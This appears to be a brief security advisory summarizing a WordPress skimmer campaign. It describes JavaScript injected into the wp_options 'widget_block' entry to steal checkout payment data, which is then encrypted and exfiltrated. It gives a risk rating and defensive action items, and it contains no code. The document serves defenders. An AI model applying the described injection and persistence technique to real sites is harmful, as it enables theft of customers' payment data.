Overview
A sophisticated new skimmer campaign targets WordPress e-commerce sites by injecting malicious JavaScript into database tables to steal payment data. The malware leverages wp_options table manipulation and multi-layer encryption
Whom it may concern
- E-commerce website operators using WordPress
- Payment processors and merchants
- Security teams monitoring web applications
- Customers entering payment details
Key Findings
- Malware injects into wp_options 'widget_block' entry for persistence
- Targets specific checkout pages using dynamic JavaScript injection
- Creates fake payment forms or hijacks legitimate fields
- Uses AES-CBC encryption and Base64 encoding for data exfiltration
Risk Analysis
- Attack Probability: High (widespread WordPress usage)
- Impact Severity: Critical (direct financial data theft)
- Detection Difficulty: High due to legitimate database location
- Potential for large-scale credential theft
Action Items
- Implement file integrity monitoring for database tables
- Deploy enhanced WAF rules for suspicious JavaScript
- Audit WordPress admin panel access
- Monitor for suspicious database table modifications
- Regular security scans of payment pages
Sources
- [The Hacker News](https://thehackernews.com/2025/01/wordpress-skimmers-evade-detection-by.html)
